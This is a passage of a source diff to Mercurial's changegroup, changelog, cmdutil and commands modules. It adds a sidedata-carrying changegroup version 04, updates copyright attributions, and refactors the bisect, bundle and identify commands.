+ assert rev == range[1] + 1
+ touched_manifests[manifest] = (range[0], rev)
+
+ self._unpackmanifests(
+ repo,
+ revmap,
+ trp,
+ progress,
+ addrevisioncb=on_manifest_rev,
+ )
needfiles = {}
if repo.ui.configbool(b'server', b'validate'):
@@ -369,12 +416,37 @@
for f, n in pycompat.iteritems(mfest):
needfiles.setdefault(f, set()).add(n)
+ on_filelog_rev = None
+ if sidedata_helpers and b'filelog' in sidedata_helpers[1]:
+
+ def on_filelog_rev(filelog, rev):
+ range = touched_filelogs.get(filelog)
+ if not range:
+ touched_filelogs[filelog] = (rev, rev)
+ else:
+ assert rev == range[1] + 1
+ touched_filelogs[filelog] = (range[0], rev)
+
# process the files
repo.ui.status(_(b"adding file changes\n"))
newrevs, newfiles = _addchangegroupfiles(
- repo, self, revmap, trp, efiles, needfiles
+ repo,
+ self,
+ revmap,
+ trp,
+ efiles,
+ needfiles,
+ addrevisioncb=on_filelog_rev,
)
+ if sidedata_helpers:
+ if b'changelog' in sidedata_helpers[1]:
+ cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1)
+ for mf, (startrev, endrev) in touched_manifests.items():
+ mf.rewrite_sidedata(sidedata_helpers, startrev, endrev)
+ for fl, (startrev, endrev) in touched_filelogs.items():
+ fl.rewrite_sidedata(sidedata_helpers, startrev, endrev)
+
# making sure the value exists
tr.changes.setdefault(b'changegroup-count-changesets', 0)
tr.changes.setdefault(b'changegroup-count-revisions', 0)
@@ -445,8 +517,12 @@
if added:
phases.registernew(repo, tr, targetphase, added)
if phaseall is not None:
- phases.advanceboundary(repo, tr, phaseall, cgnodes, revs=added)
- cgnodes = []
+ if duprevs:
+ duprevs.extend(added)
+ else:
+ duprevs = added
+ phases.advanceboundary(repo, tr, phaseall, [], revs=duprevs)
+ duprevs = []
if changesets > 0:
@@ -494,7 +570,7 @@
"""
chain = None
for chunkdata in iter(lambda: self.deltachunk(chain), {}):
- # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
+ # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags, sidedata)
yield chunkdata
chain = chunkdata[0]
@@ -534,17 +610,44 @@
node, p1, p2, deltabase, cs, flags = headertuple
return node, p1, p2, deltabase, cs, flags
- def _unpackmanifests(self, repo, revmap, trp, prog):
- super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog)
+ def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None):
+ super(cg3unpacker, self)._unpackmanifests(
+ repo, revmap, trp, prog, addrevisioncb=addrevisioncb
+ )
for chunkdata in iter(self.filelogheader, {}):
# If we get here, there are directory manifests in the changegroup
d = chunkdata[b"filename"]
repo.ui.debug(b"adding %s revisions\n" % d)
deltas = self.deltaiter()
- if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp):
+ if not repo.manifestlog.getstorage(d).addgroup(
+ deltas, revmap, trp, addrevisioncb=addrevisioncb
+ ):
raise error.Abort(_(b"received dir revlog group is empty"))
+class cg4unpacker(cg3unpacker):
+ """Unpacker for cg4 streams.
+
+ cg4 streams add support for exchanging sidedata.
+ """
+
+ version = b'04'
+
+ def deltachunk(self, prevnode):
+ res = super(cg4unpacker, self).deltachunk(prevnode)
+ if not res:
+ return res
+
+ (node, p1, p2, cs, deltabase, delta, flags, _sidedata) = res
+
+ sidedata_raw = getchunk(self._stream)
+ sidedata = {}
+ if len(sidedata_raw) > 0:
+ sidedata = sidedatamod.deserialize_sidedata(sidedata_raw)
+
+ return node, p1, p2, cs, deltabase, delta, flags, sidedata
+
+
class headerlessfixup(object):
def __init__(self, fh, h):
self._h = h
@@ -559,7 +662,7 @@
return readexactly(self._fh, n)
-def _revisiondeltatochunks(delta, headerfn):
+def _revisiondeltatochunks(repo, delta, headerfn):
"""Serialize a revisiondelta to changegroup chunks."""
# The captured revision delta may be encoded as a delta against
@@ -585,6 +688,13 @@
yield prefix
yield data
+ sidedata = delta.sidedata
+ if sidedata is not None:
+ # Need a separate chunk for sidedata to be able to differentiate
+ # "raw delta" length and sidedata length
+ yield chunkheader(len(sidedata))
+ yield sidedata
+
def _sortnodesellipsis(store, nodes, cl, lookup):
"""Sort nodes for changegroup generation."""
@@ -678,7 +788,7 @@
# We failed to resolve a parent for this node, so
# we crash the changegroup construction.
raise error.Abort(
- b'unable to resolve parent while packing %r %r'
+ b"unable to resolve parent while packing '%s' %r"
b' for changeset %r' % (store.indexfile, rev, clrev)
)
@@ -709,6 +819,7 @@
clrevtolocalrev=None,
fullclnodes=None,
precomputedellipsis=None,
+ sidedata_helpers=None,
):
"""Calculate deltas for a set of revisions.
@@ -716,6 +827,8 @@
If topic is not None, progress detail will be generated using this
topic name (e.g. changesets, manifests, etc).
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
if not nodes:
return
@@ -814,6 +927,7 @@
revisiondata=True,
assumehaveparentrevisions=not ellipses,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
for i, revision in enumerate(revisions):
@@ -854,6 +968,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
"""Given a source repo, construct a bundler.
@@ -886,6 +1001,8 @@
nodes. We store this rather than the set of nodes that should be
ellipsis because for very large histories we expect this to be
significantly smaller.
+
+ remote_sidedata is the set of sidedata categories wanted by the remote.
"""
assert oldmatcher
assert matcher
@@ -902,6 +1019,9 @@
if bundlecaps is None:
bundlecaps = set()
self._bundlecaps = bundlecaps
+ if remote_sidedata is None:
+ remote_sidedata = set()
+ self._remote_sidedata = remote_sidedata
self._isshallow = shallow
self._fullclnodes = fullnodes
@@ -928,11 +1048,26 @@
self._verbosenote(_(b'uncompressed size of bundle content:\n'))
size = 0
+ sidedata_helpers = None
+ if self.version == b'04':
+ remote_sidedata = self._remote_sidedata
+ if source == b'strip':
+ # We're our own remote when stripping, get the no-op helpers
+ # TODO a better approach would be for the strip bundle to
+ # correctly advertise its sidedata categories directly.
+ remote_sidedata = repo._wanted_sidedata
+ sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata)
+
clstate, deltas = self._generatechangelog(
- cl, clnodes, generate=changelog
+ cl,
+ clnodes,
+ generate=changelog,
+ sidedata_helpers=sidedata_helpers,
)
for delta in deltas:
- for chunk in _revisiondeltatochunks(delta, self._builddeltaheader):
+ for chunk in _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ ):
size += len(chunk)
yield chunk
@@ -977,17 +1112,20 @@
fnodes,
source,
clstate[b'clrevtomanifestrev'],
+ sidedata_helpers=sidedata_helpers,
)
for tree, deltas in it:
if tree:
- assert self.version == b'03'
+ assert self.version in (b'03', b'04')
chunk = _fileheader(tree)
size += len(chunk)
yield chunk
for delta in deltas:
- chunks = _revisiondeltatochunks(delta, self._builddeltaheader)
+ chunks = _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ )
for chunk in chunks:
size += len(chunk)
yield chunk
@@ -1002,7 +1140,7 @@
mfdicts = None
if self._ellipses and self._isshallow:
mfdicts = [
- (self._repo.manifestlog[n].read(), lr)
+ (repo.manifestlog[n].read(), lr)
for (n, lr) in pycompat.iteritems(manifests)
]
@@ -1017,6 +1155,7 @@
fastpathlinkrev,
fnodes,
clrevs,
+ sidedata_helpers=sidedata_helpers,
)
for path, deltas in it:
@@ -1025,7 +1164,9 @@
yield h
for delta in deltas:
- chunks = _revisiondeltatochunks(delta, self._builddeltaheader)
+ chunks = _revisiondeltatochunks(
+ self._repo, delta, self._builddeltaheader
+ )
for chunk in chunks:
size += len(chunk)
yield chunk
@@ -1041,7 +1182,9 @@
if clnodes:
repo.hook(b'outgoing', node=hex(clnodes[0]), source=source)
- def _generatechangelog(self, cl, nodes, generate=True):
+ def _generatechangelog(
+ self, cl, nodes, generate=True, sidedata_helpers=None
+ ):
"""Generate data for changelog chunks.
Returns a 2-tuple of a dict containing state and an iterable of
@@ -1050,6 +1193,8 @@
if generate is False, the state will be fully populated and no chunk
stream will be yielded
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
clrevorder = {}
manifests = {}
@@ -1133,6 +1278,7 @@
clrevtolocalrev={},
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
return state, gen
@@ -1146,11 +1292,14 @@
fnodes,
source,
clrevtolocalrev,
+ sidedata_helpers=None,
):
"""Returns an iterator of changegroup chunks containing manifests.
`source` is unused here, but is used by extensions like remotefilelog to
change what is sent based in pulls vs pushes, etc.
+
+ See `storageutil.emitrevisions` for the doc on `sidedata_helpers`.
"""
repo = self._repo
mfl = repo.manifestlog
@@ -1240,6 +1389,7 @@
clrevtolocalrev=clrevtolocalrev,
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
if not self._oldmatcher.visitdir(store.tree[:-1]):
@@ -1278,6 +1428,7 @@
fastpathlinkrev,
fnodes,
clrevs,
+ sidedata_helpers=None,
):
changedfiles = [
f
@@ -1372,6 +1523,7 @@
clrevtolocalrev=clrevtolocalrev,
fullclnodes=self._fullclnodes,
precomputedellipsis=self._precomputedellipsis,
+ sidedata_helpers=sidedata_helpers,
)
yield fname, deltas
@@ -1388,6 +1540,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV1_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.linknode
@@ -1418,6 +1571,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV2_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.basenode, d.linknode
@@ -1447,6 +1601,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack(
d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags
@@ -1467,12 +1622,47 @@
)
+def _makecg4packer(
+ repo,
+ oldmatcher,
+ matcher,
+ bundlecaps,
+ ellipses=False,
+ shallow=False,
+ ellipsisroots=None,
+ fullnodes=None,
+ remote_sidedata=None,
+):
+ # Same header func as cg3. Sidedata is in a separate chunk from the delta to
+ # differenciate "raw delta" and sidedata.
+ builddeltaheader = lambda d: _CHANGEGROUPV3_DELTA_HEADER.pack(
+ d.node, d.p1node, d.p2node, d.basenode, d.linknode, d.flags
+ )
+
+ return cgpacker(
+ repo,
+ oldmatcher,
+ matcher,
+ b'04',
+ builddeltaheader=builddeltaheader,
+ manifestsend=closechunk(),
+ bundlecaps=bundlecaps,
+ ellipses=ellipses,
+ shallow=shallow,
+ ellipsisroots=ellipsisroots,
+ fullnodes=fullnodes,
+ remote_sidedata=remote_sidedata,
+ )
+
+
_packermap = {
b'01': (_makecg1packer, cg1unpacker),
# cg2 adds support for exchanging generaldelta
b'02': (_makecg2packer, cg2unpacker),
# cg3 adds support for exchanging revlog flags and treemanifests
b'03': (_makecg3packer, cg3unpacker),
+ # ch4 adds support for exchanging sidedata
+ b'04': (_makecg4packer, cg4unpacker),
}
@@ -1492,11 +1682,9 @@
#
# (or even to push subset of history)
needv03 = True
- if b'exp-sidedata-flag' in repo.requirements:
- needv03 = True
- # don't attempt to use 01/02 until we do sidedata cleaning
- versions.discard(b'01')
- versions.discard(b'02')
+ has_revlogv2 = requirements.REVLOGV2_REQUIREMENT in repo.requirements
+ if not has_revlogv2:
+ versions.discard(b'04')
if not needv03:
versions.discard(b'03')
return versions
@@ -1543,7 +1731,7 @@
# will support. For example, all hg versions that support generaldelta also
# support changegroup 02.
versions = supportedoutgoingversions(repo)
- if b'generaldelta' in repo.requirements:
+ if requirements.GENERALDELTA_REQUIREMENT in repo.requirements:
versions.discard(b'01')
assert versions
return min(versions)
@@ -1559,6 +1747,7 @@
shallow=False,
ellipsisroots=None,
fullnodes=None,
+ remote_sidedata=None,
):
assert version in supportedoutgoingversions(repo)
@@ -1595,6 +1784,7 @@
shallow=shallow,
ellipsisroots=ellipsisroots,
fullnodes=fullnodes,
+ remote_sidedata=remote_sidedata,
)
@@ -1638,8 +1828,15 @@
fastpath=False,
bundlecaps=None,
matcher=None,
+ remote_sidedata=None,
):
- bundler = getbundler(version, repo, bundlecaps=bundlecaps, matcher=matcher)
+ bundler = getbundler(
+ version,
+ repo,
+ bundlecaps=bundlecaps,
+ matcher=matcher,
+ remote_sidedata=remote_sidedata,
+ )
repo = repo.unfiltered()
commonrevs = outgoing.common
@@ -1658,7 +1855,15 @@
return bundler.generate(commonrevs, csets, fastpathlinkrev, source)
-def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
+def _addchangegroupfiles(
+ repo,
+ source,
+ revmap,
+ trp,
+ expectedfiles,
+ needfiles,
+ addrevisioncb=None,
+):
revisions = 0
files = 0
progress = repo.ui.makeprogress(
@@ -1673,7 +1878,13 @@
o = len(fl)
try:
deltas = source.deltaiter()
- if not fl.addgroup(deltas, revmap, trp):
+ added = fl.addgroup(
+ deltas,
+ revmap,
+ trp,
+ addrevisioncb=addrevisioncb,
+ )
+ if not added:
raise error.Abort(_(b"received file revlog group is empty"))
except error.CensoredBaseError as e:
raise error.Abort(_(b"received delta base is censored: %s") % e)
@@ -1702,3 +1913,25 @@
)
return revisions, files
+
+
+def get_sidedata_helpers(repo, remote_sd_categories, pull=False):
+ # Computers for computing sidedata on-the-fly
+ sd_computers = collections.defaultdict(list)
+ # Computers for categories to remove from sidedata
+ sd_removers = collections.defaultdict(list)
+
+ to_generate = remote_sd_categories - repo._wanted_sidedata
+ to_remove = repo._wanted_sidedata - remote_sd_categories
+ if pull:
+ to_generate, to_remove = to_remove, to_generate
+
+ for revlog_kind, computers in repo._sidedata_computers.items():
+ for category, computer in computers.items():
+ if category in to_generate:
+ sd_computers[revlog_kind].append(computer)
+ if category in to_remove:
+ sd_removers[revlog_kind].append(computer)
+
+ sidedata_helpers = (repo, sd_computers, sd_removers)
+ return sidedata_helpers
--- a/mercurial/changelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/changelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# changelog.py - changelog class for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -191,7 +191,7 @@
# Extensions might modify _defaultextra, so let the constructor below pass
# it in
extra = attr.ib()
- manifest = attr.ib(default=nullid)
+ manifest = attr.ib()
user = attr.ib(default=b'')
date = attr.ib(default=(0, 0))
files = attr.ib(default=attr.Factory(list))
@@ -200,6 +200,7 @@
p1copies = attr.ib(default=None)
p2copies = attr.ib(default=None)
description = attr.ib(default=b'')
+ branchinfo = attr.ib(default=(_defaultextra[b'branch'], False))
class changelogrevision(object):
@@ -218,9 +219,9 @@
'_changes',
)
- def __new__(cls, text, sidedata, cpsd):
+ def __new__(cls, cl, text, sidedata, cpsd):
if not text:
- return _changelogrevision(extra=_defaultextra)
+ return _changelogrevision(extra=_defaultextra, manifest=nullid)
self = super(changelogrevision, cls).__new__(cls)
# We could return here and implement the following as an __init__.
@@ -372,9 +373,14 @@
def description(self):
return encoding.tolocal(self._text[self._offsets[3] + 2 :])
+ @property
+ def branchinfo(self):
+ extra = self.extra
+ return encoding.tolocal(extra.get(b"branch")), b'close' in extra
+
class changelog(revlog.revlog):
- def __init__(self, opener, trypending=False):
+ def __init__(self, opener, trypending=False, concurrencychecker=None):
"""Load a changelog revlog using an opener.
If ``trypending`` is true, we attempt to load the index from a
@@ -383,6 +389,9 @@
revision) data for a transaction that hasn't been finalized yet.
It exists in a separate file to facilitate readers (such as
hooks processes) accessing data before a transaction is finalized.
+
+ ``concurrencychecker`` will be passed to the revlog init function, see
+ the documentation there.
"""
if trypending and opener.exists(b'00changelog.i.a'):
indexfile = b'00changelog.i.a'
@@ -398,6 +407,7 @@
checkambig=True,
mmaplargeindex=True,
persistentnodemap=opener.options.get(b'persistent-nodemap', False),
+ concurrencychecker=concurrencychecker,
)
if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1):
@@ -418,6 +428,7 @@
self._filteredrevs = frozenset()
self._filteredrevs_hashcache = {}
self._copiesstorage = opener.options.get(b'copies-storage')
+ self.revlog_kind = b'changelog'
@property
def filteredrevs(self):
@@ -497,7 +508,7 @@
if not self._delayed:
revlog.revlog._enforceinlinesize(self, tr, fp)
- def read(self, node):
+ def read(self, nodeorrev):
"""Obtain data from a parsed changelog revision.
Returns a 6-tuple of:
@@ -513,9 +524,9 @@
``changelogrevision`` instead, as it is faster for partial object
access.
"""
- d, s = self._revisiondata(node)
+ d, s = self._revisiondata(nodeorrev)
c = changelogrevision(
- d, s, self._copiesstorage == b'changeset-sidedata'
+ self, d, s, self._copiesstorage == b'changeset-sidedata'
)
return (c.manifest, c.user, c.date, c.files, c.description, c.extra)
@@ -523,14 +534,14 @@
"""Obtain a ``changelogrevision`` for a node or revision."""
text, sidedata = self._revisiondata(nodeorrev)
return changelogrevision(
- text, sidedata, self._copiesstorage == b'changeset-sidedata'
+ self, text, sidedata, self._copiesstorage == b'changeset-sidedata'
)
- def readfiles(self, node):
+ def readfiles(self, nodeorrev):
"""
short version of read that only returns the files modified by the cset
"""
- text = self.revision(node)
+ text = self.revision(nodeorrev)
if not text:
return []
last = text.index(b"\n\n")
@@ -592,21 +603,21 @@
parseddate = b"%s %s" % (parseddate, extra)
l = [hex(manifest), user, parseddate] + sortedfiles + [b"", desc]
text = b"\n".join(l)
- return self.addrevision(
+ rev = self.addrevision(
text, transaction, len(self), p1, p2, sidedata=sidedata, flags=flags
)
+ return self.node(rev)
def branchinfo(self, rev):
"""return the branch name and open/close state of a revision
This function exists because creating a changectx object
just to access this is costly."""
- extra = self.changelogrevision(rev).extra
- return encoding.tolocal(extra.get(b"branch")), b'close' in extra
+ return self.changelogrevision(rev).branchinfo
- def _nodeduplicatecallback(self, transaction, node):
+ def _nodeduplicatecallback(self, transaction, rev):
# keep track of revisions that got "re-added", eg: unbunde of know rev.
#
# We track them in a list to preserve their order from the source bundle
duplicates = transaction.changes.setdefault(b'revduplicates', [])
- duplicates.append(self.rev(node))
+ duplicates.append(rev)
--- a/mercurial/cmdutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cmdutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# cmdutil.py - help for command processing in mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -16,6 +16,7 @@
from .node import (
hex,
nullid,
+ nullrev,
short,
)
from .pycompat import (
@@ -1936,12 +1937,12 @@
ui.debug(b'message:\n%s\n' % (message or b''))
if len(parents) == 1:
- parents.append(repo[nullid])
+ parents.append(repo[nullrev])
if opts.get(b'exact'):
if not nodeid or not p1:
raise error.InputError(_(b'not a Mercurial patch'))
p1 = repo[p1]
- p2 = repo[p2 or nullid]
+ p2 = repo[p2 or nullrev]
elif p2:
try:
p1 = repo[p1]
@@ -1951,10 +1952,10 @@
# first parent.
if p1 != parents[0]:
p1 = parents[0]
- p2 = repo[nullid]
+ p2 = repo[nullrev]
except error.RepoError:
p1, p2 = parents
- if p2.node() == nullid:
+ if p2.rev() == nullrev:
ui.warn(
_(
b"warning: import the patch as a normal revision\n"
@@ -2967,20 +2968,6 @@
# Reroute the working copy parent to the new changeset
repo.setparents(newid, nullid)
- mapping = {old.node(): (newid,)}
- obsmetadata = None
- if opts.get(b'note'):
- obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])}
- backup = ui.configbool(b'rewrite', b'backup-bundle')
- scmutil.cleanupnodes(
- repo,
- mapping,
- b'amend',
- metadata=obsmetadata,
- fixphase=True,
- targetphase=commitphase,
- backup=backup,
- )
# Fixing the dirstate because localrepo.commitctx does not update
# it. This is rather convenient because we did not need to update
@@ -3003,6 +2990,21 @@
for f in removedfiles:
dirstate.drop(f)
+ mapping = {old.node(): (newid,)}
+ obsmetadata = None
+ if opts.get(b'note'):
+ obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])}
+ backup = ui.configbool(b'rewrite', b'backup-bundle')
+ scmutil.cleanupnodes(
+ repo,
+ mapping,
+ b'amend',
+ metadata=obsmetadata,
+ fixphase=True,
+ targetphase=commitphase,
+ backup=backup,
+ )
+
return newid
@@ -3774,7 +3776,7 @@
raise error.StateError(state.msg(), hint=state.hint())
for s in statemod._unfinishedstates:
- if s._opname == b'merge' or state._reportonly:
+ if s._opname == b'merge' or s._reportonly:
continue
if s._clearable and s.isunfinished(repo):
util.unlink(repo.vfs.join(s._fname))
--- a/mercurial/commands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# commands.py - command processing for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -74,8 +74,15 @@
from .utils import (
dateutil,
stringutil,
+ urlutil,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ List,
+ )
+
+
table = {}
table.update(debugcommandsmod.command._table)
@@ -1107,9 +1114,8 @@
transition = b"bad"
state[transition].append(node)
ctx = repo[node]
- ui.status(
- _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition)
- )
+ summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect')
+ ui.status(_(b'changeset %s: %s\n') % (summary, transition))
hbisect.checkstate(state)
# bisect
nodes, changesets, bgood = hbisect.bisect(repo, state)
@@ -1125,15 +1131,15 @@
nodes, changesets, good = hbisect.bisect(repo, state)
if extend:
if not changesets:
- extendnode = hbisect.extendrange(repo, state, nodes, good)
- if extendnode is not None:
+ extendctx = hbisect.extendrange(repo, state, nodes, good)
+ if extendctx is not None:
ui.write(
- _(b"Extending search to changeset %d:%s\n")
- % (extendnode.rev(), extendnode)
+ _(b"Extending search to changeset %s\n")
+ % cmdutil.format_changeset_summary(ui, extendctx, b'bisect')
)
- state[b'current'] = [extendnode.node()]
+ state[b'current'] = [extendctx.node()]
hbisect.save_state(repo, state)
- return mayupdate(repo, extendnode.node())
+ return mayupdate(repo, extendctx.node())
raise error.StateError(_(b"nothing to extend"))
if changesets == 0:
@@ -1146,12 +1152,13 @@
while size <= changesets:
tests, size = tests + 1, size * 2
rev = repo.changelog.rev(node)
+ summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect')
ui.write(
_(
- b"Testing changeset %d:%s "
+ b"Testing changeset %s "
b"(%d changesets remaining, ~%d tests)\n"
)
- % (rev, short(node), changesets, tests)
+ % (summary, changesets, tests)
)
state[b'current'] = [node]
hbisect.save_state(repo, state)
@@ -1524,10 +1531,10 @@
),
]
+ remoteopts,
- _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'),
+ _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]...'),
helpcategory=command.CATEGORY_IMPORT_EXPORT,
)
-def bundle(ui, repo, fname, dest=None, **opts):
+def bundle(ui, repo, fname, *dests, **opts):
"""create a bundle file
Generate a bundle file containing data to be transferred to another
@@ -1538,7 +1545,7 @@
all the nodes you specify with --base parameters. Otherwise, hg
will assume the repository has all the nodes in destination, or
default-push/default if no destination is specified, where destination
- is the repository you provide through DEST option.
+ is the repositories you provide through DEST option.
You can change bundle format with the -t/--type option. See
:hg:`help bundlespec` for documentation on this format. By default,
@@ -1583,9 +1590,9 @@
)
if opts.get(b'all'):
- if dest:
+ if dests:
raise error.InputError(
- _(b"--all is incompatible with specifying a destination")
+ _(b"--all is incompatible with specifying destinations")
)
if opts.get(b'base'):
ui.warn(_(b"ignoring --base because --all was specified\n"))
@@ -1598,31 +1605,54 @@
)
if base:
- if dest:
+ if dests:
raise error.InputError(
- _(b"--base is incompatible with specifying a destination")
+ _(b"--base is incompatible with specifying destinations")
)
common = [repo[rev].node() for rev in base]
heads = [repo[r].node() for r in revs] if revs else None
outgoing = discovery.outgoing(repo, common, heads)
+ missing = outgoing.missing
+ excluded = outgoing.excluded
else:
- dest = ui.expandpath(dest or b'default-push', dest or b'default')
- dest, branches = hg.parseurl(dest, opts.get(b'branch'))
- other = hg.peer(repo, opts, dest)
- revs = [repo[r].hex() for r in revs]
- revs, checkout = hg.addbranchrevs(repo, repo, branches, revs)
- heads = revs and pycompat.maplist(repo.lookup, revs) or revs
- outgoing = discovery.findcommonoutgoing(
- repo,
- other,
- onlyheads=heads,
- force=opts.get(b'force'),
- portable=True,
+ missing = set()
+ excluded = set()
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ other = hg.peer(repo, opts, path.rawloc)
+ if revs is not None:
+ hex_revs = [repo[r].hex() for r in revs]
+ else:
+ hex_revs = None
+ branches = (path.branch, [])
+ head_revs, checkout = hg.addbranchrevs(
+ repo, repo, branches, hex_revs
+ )
+ heads = (
+ head_revs
+ and pycompat.maplist(repo.lookup, head_revs)
+ or head_revs
+ )
+ outgoing = discovery.findcommonoutgoing(
+ repo,
+ other,
+ onlyheads=heads,
+ force=opts.get(b'force'),
+ portable=True,
+ )
+ missing.update(outgoing.missing)
+ excluded.update(outgoing.excluded)
+
+ if not missing:
+ scmutil.nochangesfound(ui, repo, not base and excluded)
+ return 1
+
+ if heads:
+ outgoing = discovery.outgoing(
+ repo, missingroots=missing, ancestorsof=heads
)
-
- if not outgoing.missing:
- scmutil.nochangesfound(ui, repo, not base and outgoing.excluded)
- return 1
+ else:
+ outgoing = discovery.outgoing(repo, missingroots=missing)
+ outgoing.excluded = sorted(excluded)
if cgversion == b'01': # bundle1
bversion = b'HG10' + bundlespec.wirecompression
@@ -1648,6 +1678,14 @@
if complevel is not None:
compopts[b'level'] = complevel
+ compthreads = ui.configint(
+ b'experimental', b'bundlecompthreads.' + bundlespec.compression
+ )
+ if compthreads is None:
+ compthreads = ui.configint(b'experimental', b'bundlecompthreads')
+ if compthreads is not None:
+ compopts[b'threads'] = compthreads
+
# Bundling of obsmarker and phases is optional as not all clients
# support the necessary features.
cfg = ui.configbool
@@ -2399,7 +2437,8 @@
To undo marking a destination file as copied, use --forget. With that
option, all given (positional) arguments are unmarked as copies. The
- destination file(s) will be left in place (still tracked).
+ destination file(s) will be left in place (still tracked). Note that
+ :hg:`copy --forget` behaves the same way as :hg:`rename --forget`.
This command takes effect with the next commit by default.
@@ -2550,7 +2589,7 @@
if change:
repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn')
ctx2 = scmutil.revsingle(repo, change, None)
- ctx1 = ctx2.p1()
+ ctx1 = logcmdutil.diff_parent(ctx2)
elif from_rev or to_rev:
repo = scmutil.unhidehashlikerevs(
repo, [from_rev] + [to_rev], b'nowarn'
@@ -3287,7 +3326,8 @@
)
# checking that newnodes exist because old state files won't have it
elif statedata.get(b'newnodes') is not None:
- statedata[b'newnodes'].append(node)
+ nn = statedata[b'newnodes'] # type: List[bytes]
+ nn.append(node)
# remove state when we complete successfully
if not opts.get(b'dry_run'):
@@ -3821,132 +3861,140 @@
output = []
revs = []
- if source:
- source, branches = hg.parseurl(ui.expandpath(source))
- peer = hg.peer(repo or ui, opts, source) # only pass ui when no repo
- repo = peer.local()
- revs, checkout = hg.addbranchrevs(repo, peer, branches, None)
-
- fm = ui.formatter(b'identify', opts)
- fm.startitem()
-
- if not repo:
- if num or branch or tags:
- raise error.InputError(
- _(b"can't query remote revision number, branch, or tags")
+ peer = None
+ try:
+ if source:
+ source, branches = urlutil.get_unique_pull_path(
+ b'identify', repo, ui, source
)
- if not rev and revs:
- rev = revs[0]
- if not rev:
- rev = b"tip"
-
- remoterev = peer.lookup(rev)
- hexrev = fm.hexfunc(remoterev)
- if default or id:
- output = [hexrev]
- fm.data(id=hexrev)
-
- @util.cachefunc
- def getbms():
- bms = []
-
- if b'bookmarks' in peer.listkeys(b'namespaces'):
- hexremoterev = hex(remoterev)
- bms = [
- bm
- for bm, bmr in pycompat.iteritems(
- peer.listkeys(b'bookmarks')
+ # only pass ui when no repo
+ peer = hg.peer(repo or ui, opts, source)
+ repo = peer.local()
+ revs, checkout = hg.addbranchrevs(repo, peer, branches, None)
+
+ fm = ui.formatter(b'identify', opts)
+ fm.startitem()
+
+ if not repo:
+ if num or branch or tags:
+ raise error.InputError(
+ _(b"can't query remote revision number, branch, or tags")
+ )
+ if not rev and revs:
+ rev = revs[0]
+ if not rev:
+ rev = b"tip"
+
+ remoterev = peer.lookup(rev)
+ hexrev = fm.hexfunc(remoterev)
+ if default or id:
+ output = [hexrev]
+ fm.data(id=hexrev)
+
+ @util.cachefunc
+ def getbms():
+ bms = []
+
+ if b'bookmarks' in peer.listkeys(b'namespaces'):
+ hexremoterev = hex(remoterev)
+ bms = [
+ bm
+ for bm, bmr in pycompat.iteritems(
+ peer.listkeys(b'bookmarks')
+ )
+ if bmr == hexremoterev
+ ]
+
+ return sorted(bms)
+
+ if fm.isplain():
+ if bookmarks:
+ output.extend(getbms())
+ elif default and not ui.quiet:
+ # multiple bookmarks for a single parent separated by '/'
+ bm = b'/'.join(getbms())
+ if bm:
+ output.append(bm)
+ else:
+ fm.data(node=hex(remoterev))
+ if bookmarks or b'bookmarks' in fm.datahint():
+ fm.data(bookmarks=fm.formatlist(getbms(), name=b'bookmark'))
+ else:
+ if rev:
